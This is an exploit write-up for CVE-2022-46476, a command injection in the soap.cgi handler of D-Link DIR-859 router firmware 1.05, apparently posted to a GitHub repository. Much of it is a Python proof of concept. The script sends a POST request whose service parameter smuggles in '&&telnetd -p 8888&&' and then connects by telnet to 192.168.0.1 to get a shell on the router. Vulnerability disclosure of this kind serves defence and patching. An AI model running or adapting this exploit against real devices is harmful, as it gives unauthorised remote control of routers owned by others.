CVE-2022-46476: iot/dir859 Command Execution Vulnerability.md at main · Insight8991/iot

D-Link DIR-859 Command Execution Vulnerability

Vender: D-Link

Firmware version: DIR 859A1 1.05

Exploit Author: Insight

Vendor Homepage: http: //www.dlink.com.cn/

Detailed description

This vulnerability exists in the soapcgi_main function of the cgibin program. v11 is the content behind the request_uri environment variable service=, which has been filtered, but the filtering is not rigorous.

Format v11 to byte_434EF0, and execute system, resulting in command execution.

POC

from socket import * from os import * from time import *

request = b"POST /soap.cgi?service=&&telnetd -p 8888&& HTTP/1.1\r\n" request += b"Host: localhost:49152\r\n" request += b"Content-Type: text/xml\r\n" request += b"Content-Length: 88\r\n" request += b"SOAPAction: a#b\r\n\r\n"

s = socket(AF_INET, SOCK_STREAM) s.connect((gethostbyname(“192.168.0.1”), 49152)) s.send(request)

sleep(1) system(‘telnet 192.168.0.1 8888’)